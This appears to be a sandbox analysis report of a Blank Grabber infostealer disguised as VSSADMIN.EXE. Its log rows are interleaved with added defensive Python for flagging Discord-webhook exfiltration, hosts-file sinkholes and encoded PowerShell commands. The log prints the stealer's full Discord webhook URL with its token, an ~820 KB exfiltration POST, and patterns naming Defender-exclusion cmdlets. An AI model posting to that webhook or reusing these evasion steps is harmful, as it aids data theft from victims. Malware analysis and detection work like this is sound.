Source: VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D53C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D53C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920P
Source: VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/3020
Source: powershell.exe, 00000008.00000002.200799345.000001960159C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.00000196013E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.0000019601682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.200799345.00000196015CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB94965000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/
Source: VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/mail
Source: VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/mail/
Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
Source: VSSADMIN.EXE.exe, 00000001.00000002.245082174.0000014C6D256000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244323782.0000014C6D256000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/
Source: VSSADMIN.EXE.exe, 00000001.00000003.244230392.0000014C6D0A8000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0A8000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0BD000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.g
Source: VSSADMIN.EXE.exe, 00000001.00000003.192539784.0000014C6CCF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://json.org
Source: VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://media.discordapp.net/attachments/1125126396101021879/1152337129716842596/Blank-user.rar
Source: powershell.exe, 00000008.00000002.203170941.000001961006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.213633316.000001FB930A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA2F10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.222515126.000001FBA3052000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000003.191782438.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191891921.0000014C6CBD7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191706435.0000014C6CBD7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244706685.0000014C6CAB0000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190653423.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.190620855.0000014C6CBDB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192012033.0000014C6CBDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
Source: VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD402EB000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://peps.python.org/pep-0263/
Source: VSSADMIN.EXE.exe, 00000001.00000002.245082174.0000014C6D24A000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz
Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
Source: VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: VSSADMIN.EXE.exe, 00000001.00000002.244829623.0000014C6CEB0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://twitter.com/
Source: VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D540000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: VSSADMIN.EXE.exe, 00000001.00000002.245190782.0000014C6D51C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: VSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D1B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
Source: VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/favicon.ico
Source: VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245994756.00007FFD43FB3000.00000004.00000001.01000000.00000010.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245643822.00007FFD3FF47000.00000004.00000001.01000000.0000000F.sdmp | String found in binary or memory: https://www.openssl.org/H
              Source: VSSADMIN.EXE.exe, 00000001.00000003.189820148.0000014C6C9F5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244623924.0000014C6C580000.00000004.00001000.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189777515.0000014C6CA10000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189806826.0000014C6CA14000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189777515.0000014C6C9F5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.189789642.0000014C6CA14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD40388000.00000040.00000001.01000000.00000004.sdmp | String found in binary or memory: https://www.python.org/psf/license/
Source: VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
Source: unknown | DNS traffic detected: queries for: blank-2md3e.in
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Accept-Encoding: identity | User-Agent: python-urllib3/2.0.4
Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 | Host: ip-api.com | Accept-Encoding: identity | User-Agent: python-urllib3/2.0.4
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | HTTP traffic detected: POST /api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k HTTP/1.1 | Host: discord.com | Accept-Encoding: identity | Content-Length: 838652 | User-Agent: python-urllib3/2.0.4 | Content-Type: multipart/form-data; boundary=df04b12a7b80d1dae6cbaca19bb29ce2
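The HTTP rows above are the sample's exfiltration path in miniature: two ip-api.com lookups, one of which asks only for the hosting flag, followed by a multipart POST of roughly 820 KB to a Discord webhook, all sent with urllib3's default User-Agent. The following Python is an added example, not code from this report or from Blank Grabber. It parses request rows of that shape and tags them the way a detection engineer would when turning such a report into a rule. The sample rows are constructed to mirror the report; the webhook ID and token in them are placeholders rather than the values recorded above, and the 100 KB "large upload" threshold is our own choice.

```python
"""Classify HTTP request observations for infostealer exfiltration patterns.

Added example; not code from the Joe Sandbox report or from Blank Grabber.
Input records mirror the report's "HTTP traffic detected" rows (request line
followed by headers). The webhook ID and token below are constructed
placeholders, not the values recorded in the analysis.
"""
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Constructed sample rows; fields are separated with '|' for readability.
SAMPLE_REQUESTS = [
    "GET /line/?fields=hosting HTTP/1.1|Host: ip-api.com|"
    "Accept-Encoding: identity|User-Agent: python-urllib3/2.0.4",
    "GET /json/?fields=225545 HTTP/1.1|Host: ip-api.com|"
    "Accept-Encoding: identity|User-Agent: python-urllib3/2.0.4",
    "POST /api/webhooks/1111111111111111111/EXAMPLE-webhook-token-0000000000 HTTP/1.1|"
    "Host: discord.com|Accept-Encoding: identity|Content-Length: 838652|"
    "User-Agent: python-urllib3/2.0.4|"
    "Content-Type: multipart/form-data; boundary=df04b12a7b80d1dae6cbaca19bb29ce2",
    "GET /generate_204 HTTP/1.1|Host: gstatic.com|User-Agent: python-urllib3/2.0.4",
]

WEBHOOK_RE = re.compile(r"^/api/webhooks/(?P<id>\d{17,20})/(?P<token>[A-Za-z0-9_-]+)$")
WEBHOOK_HOSTS = {"discord.com", "discordapp.com"}
LARGE_BODY = 100 * 1024  # bytes; our threshold, a stealer archive dwarfs a chat message


@dataclass
class Request:
    method: str
    path: str
    headers: dict


def parse_request(row: str) -> Request:
    """Split one '|'-separated row into method, path and lower-cased header names."""
    request_line, *header_lines = row.split("|")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(": ")
        headers[name.lower()] = value
    return Request(method, path, headers)


def redact_webhook(path: str) -> str:
    """Keep the webhook ID (needed for blocking/takedown) but hide the secret token."""
    m = WEBHOOK_RE.match(path)
    if not m:
        return path
    return f"/api/webhooks/{m['id']}/{m['token'][:4]}...[redacted]"


def classify(req: Request) -> list:
    """Return the tags that apply to one request, in a fixed order."""
    tags = []
    host = req.headers.get("host", "").lower()
    ua = req.headers.get("user-agent", "")
    query = parse_qs(urlsplit(req.path).query)

    if host == "ip-api.com":
        tags.append("public_ip_lookup")
        if "hosting" in query.get("fields", []):
            # Asking specifically for the hosting flag is a VPS/sandbox check.
            tags.append("hosting_flag_check")

    if host in WEBHOOK_HOSTS and req.method == "POST" and WEBHOOK_RE.match(req.path):
        tags.append("discord_webhook_post")
        ctype = req.headers.get("content-type", "")
        length = int(req.headers.get("content-length", "0") or 0)
        if ctype.startswith("multipart/form-data") and length > LARGE_BODY:
            tags.append("large_file_upload")

    if ua.startswith("python-urllib3/"):
        # urllib3's default User-Agent: the client made no attempt to blend in.
        tags.append("python_urllib3_client")
    return tags


def triage(rows: list) -> list:
    """Classify every row; webhook tokens are redacted in the returned summaries."""
    out = []
    for row in rows:
        req = parse_request(row)
        summary = f"{req.method} {req.headers.get('host', '?')}{redact_webhook(req.path)}"
        out.append((summary, classify(req)))
    return out


if __name__ == "__main__":
    for summary, tags in triage(SAMPLE_REQUESTS):
        print(f"{summary:<70} {', '.join(tags) or '-'}")
```

The webhook ID is kept in the output because it is the one part of the URL that is safe to share and useful to block; the token is the secret that lets anyone post to, or delete, the webhook, so it is cut off after four characters.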

              Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\LTKMYBSEYZ.jpg
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\ONBQCLYSPU.docx
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\WUTJSCBCFX.png
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: cmd.exe | Process created: 45
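The report records that the sample wrote C:\Windows\System32\drivers\etc\hosts but not what it wrote. On a stock Windows install every line of that file is a comment, so the first triage step on a host showing this behaviour is simply to list the active mappings and single out names that have been pointed at nowhere. The Python below is an added example, not code from this report or from Blank Grabber; the hosts content it parses is constructed with .example names, and the blackhole heuristic (a non-local name mapped to 0.0.0.0, 127.0.0.0/8 or ::1) is ours.

```python
"""Triage a Windows hosts file for blackholed or redirected names.

Added example; not code from the report or from Blank Grabber. The report
records only that the sample wrote the hosts file, not its content, so the
entries below are constructed and use .example names.
"""
import ipaddress
from dataclasses import dataclass

# Constructed hosts file. Lines 1-5 are the stock Windows comments; the rest
# are illustrative entries an infostealer or a sysadmin might have added.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 127.0.0.1       localhost
# ::1             localhost
0.0.0.0 av-vendor.example www.av-vendor.example
127.0.0.1 updates.av-vendor.example   # constructed blackhole entry
::1 telemetry.av-vendor.example
10.0.0.5 intranet.example             # constructed, plausible admin mapping
not-an-ip something.example
"""

LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback"}


@dataclass
class HostsEntry:
    lineno: int
    ip: str
    names: list


def parse_hosts(text: str) -> list:
    """Return the active (non-comment) entries; inline '#' comments are stripped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        if names:
            entries.append(HostsEntry(lineno, ip, names))
    return entries


def is_blackhole(ip: str) -> bool:
    """True for 0.0.0.0, 127.0.0.0/8 and ::1, the addresses used to sinkhole a name."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_unspecified or addr.is_loopback


def suspicious_entries(entries: list) -> list:
    """Entries that sinkhole a non-local name, plus lines that are not addresses at all."""
    flagged = []
    for e in entries:
        names = [n for n in e.names if n.lower() not in LOCAL_NAMES]
        if not names:
            continue  # 'localhost' style entries are harmless
        try:
            ipaddress.ip_address(e.ip)
        except ValueError:
            flagged.append(e)  # malformed line: still worth a look
            continue
        if is_blackhole(e.ip):
            flagged.append(e)
    return flagged


def sinkholed_names(text: str) -> list:
    """Sorted list of every non-local name the file redirects to nowhere."""
    names = set()
    for e in suspicious_entries(parse_hosts(text)):
        if is_blackhole(e.ip):
            names.update(n.lower() for n in e.names if n.lower() not in LOCAL_NAMES)
    return sorted(names)


if __name__ == "__main__":
    for e in suspicious_entries(parse_hosts(SAMPLE_HOSTS)):
        print(f"line {e.lineno}: {e.ip} -> {', '.join(e.names)}")
```

The intranet.example mapping is deliberately not flagged: redirecting a name to a routable address is a legitimate use of the file, and treating every entry as hostile produces noise. Whether such a mapping is benign is a question for the asset owner, not for the parser.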

              System Summary

Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 3615
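The report measures the command lines (3647 and 3615 bytes) but does not reproduce them; together with the traits it raises elsewhere (encoded PowerShell command lines, execution-policy bypass, Defender preference changes) they describe the process tree a detection engineer wants to catch. The Python below is an added example, not code from this report or from Blank Grabber: it scores constructed process-creation events for those traits and decodes an -EncodedCommand payload. The encoded payload is generated inside the block from a constructed Add-MpPreference one-liner so the decoder can be exercised offline, the 2048-byte length threshold is ours, and nothing here reproduces the sample's actual command lines.

```python
"""Flag the command-line traits a sandbox report records: very long command
lines, PowerShell execution-policy bypass and -EncodedCommand payloads.

Added example; not code from the report or from Blank Grabber. Events below
are constructed; the encoded payload is built here from a constructed script.
"""
import base64
import re
from typing import Optional

LONG_CMDLINE = 2048  # bytes; our threshold, the report's is not documented

# powershell.exe accepts -e, -ec, -enc and -EncodedCommand (and / instead of -).
# '-ExecutionPolicy' does not match: after '-e' the next char must be c|n or whitespace.
ENCODED_RE = re.compile(r"(?:^|\s)[-/]e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
EXEC_POLICY_RE = re.compile(r"(?:^|\s)[-/](?:ep|ex|exec|executionpolicy)\s+(bypass|unrestricted)", re.I)
DEFENDER_CMDLETS = ("add-mppreference", "set-mppreference", "remove-mppreference")


def encode_powershell(script: str) -> str:
    """What powershell.exe expects after -EncodedCommand: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_powershell(blob: str) -> Optional[str]:
    """Inverse of encode_powershell; None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed one-liner, chosen because the report flags Defender exclusions.
CONSTRUCTED_SCRIPT = "Add-MpPreference -ExclusionPath 'C:\\ProgramData\\Example'"

# Constructed process-creation events; 'cmdline' stands in for the Sysmon/4688 field.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c " + "A" * 3600},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
                + encode_powershell(CONSTRUCTED_SCRIPT)},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\user\notes.txt"},
]


def analyze(event: dict) -> dict:
    """Return {'tags': [...], 'decoded': script-or-None} for one process-creation event."""
    cmd = event["cmdline"]
    tags, decoded = [], None
    if len(cmd) > LONG_CMDLINE:
        tags.append("very_long_cmdline")
    if EXEC_POLICY_RE.search(cmd):
        tags.append("execution_policy_bypass")
    m = ENCODED_RE.search(cmd)
    if m:
        tags.append("encoded_command")
        decoded = decode_powershell(m.group(1))
        if decoded is None:
            tags.append("encoded_command_undecodable")
        elif any(c in decoded.lower() for c in DEFENDER_CMDLETS):
            tags.append("defender_preference_change")
    return {"tags": tags, "decoded": decoded}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = analyze(ev)
        print(ev["image"].rsplit("\\", 1)[-1], r["tags"], r["decoded"])
```

Decoding the payload matters more than matching the switch: an -EncodedCommand by itself is common in legitimate automation, while the decoded script is what tells you whether it is a Defender exclusion, a downloader or a scheduled-task install. A real pipeline would also recurse, since decoded scripts frequently contain a second encoded layer.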
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Section loaded: python3.dll
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe Code function: 59_2_00007FF6EE77B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe Code function: String function: 00007FF6EE748444 appears 48 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe Code function: String function: 00007FF6EE7749F4 appears 53 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: String function: 00007FFD3FBF2A09 appears 144 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: String function: 00007FFD3FBF2739 appears 418 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: String function: 00007FFD3FBF3012 appears 50 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: String function: 00007FFD3FBF405C appears 631 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: String function: 00007FFD3FBF698D appears 44 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: String function: 00007FFD3FBF4840 appears 111 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: String function: 00007FFD3FBF24B9 appears 65 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: String function: 00007FFD3FBF1EF1 appears 1222 times
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: String function: 00007FF614C72770 appears 82 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe Code function: 59_2_00007FF6EE753A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle
              Source: rar.exe.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: VSSADMIN.EXE.exe Binary or memory string: OriginalFilename vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000000.187671270.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVSSADMIN.EXEj% vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187735351.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exeBinary or memory string: OriginalFilename vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245920910.00007FFD43EFB000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246274689.00007FFD526AC000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246379014.00007FFD5560C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245820603.00007FFD4054B000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246110254.00007FFD44164000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246518063.00007FFD592DC000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246157050.00007FFD44A02000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245994756.00007FFD43FB3000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246601065.00007FFD59307000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000000.188990624.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVSSADMIN.EXEj% vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246206992.00007FFD507F8000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246478224.00007FFD59283000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246337519.00007FFD52E08000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246042976.00007FFD43FED000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs VSSADMIN.EXE.exe
              Source: VSSADMIN.EXE.exe, 00000001.00000002.246427952.00007FFD59262000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs VSSADMIN.EXE.exe
